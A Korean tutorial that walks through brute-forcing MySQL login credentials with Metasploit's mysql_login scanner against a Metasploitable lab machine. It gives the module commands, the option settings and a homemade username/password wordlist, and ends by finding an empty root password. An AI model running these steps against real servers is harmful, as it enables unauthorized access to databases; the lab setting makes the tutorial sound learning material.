취약점 진단 툴인 Metasploit을 사용해 보자


여기서는 Metasploitable을 사용하여 테스트 해보겠다


(설치방법은 리눅스 카테고리)


먼저 msfconsole을 입력하여 msf를 실행하자(test mode이다)


(조금 기다려야 실행이 완료 된다)


실행 완료


이제 해볼 것은 mysql 서버에 사전 파일을 이용하여 비밀번호를 브루트포스 하는 공격이다


search mysql_login 을 입력하자



결과에 나온것을 use 를 이용하여 입력한다


use auxiliary/scanner/mysql/mysql_login



그리고 show options 까지 입력한 모습이다


사용하기 위해서 Required 되는 값을 채워야한다


Yes로 되어있는 부븐은 꼭 채워야한다


set 명령어를 통해 옵션값을 넣어줄 수 있다


set RHOSTS 192.168.0.11 (metasploitable 의 ip)



테스트용 이기 때문에 사전 파일을 하나 만들어서 써보자


터미널 창을 하나 더 열어서


echo "admin" > user.txt

echo "administrator" >> user.txt

echo "root" >> user.txt

cp user.txt pass.txt

echo '' >> pass.txt

cat *.txt



사전 파일을 만들었다 ( 테스트용 )


터미널을 닫아서 아까 msf 터미널로 가자


set USER_FILE /root/user.txt

set PASS_FILE /root/pass.txt



이제 브루트포스해보자


run


보면 [*] 으로 쭉 나오다가


끝에 쯤 [+] 로 색이 조금 다른 걸 보면 root: 라고 되어있는걸 볼 수 있다


Target(192.168.0.11ip)의 mysql(3306port)의 ID가 root이고 password가 설정 되어있지 않은걸 찾아냈다 (root:[password])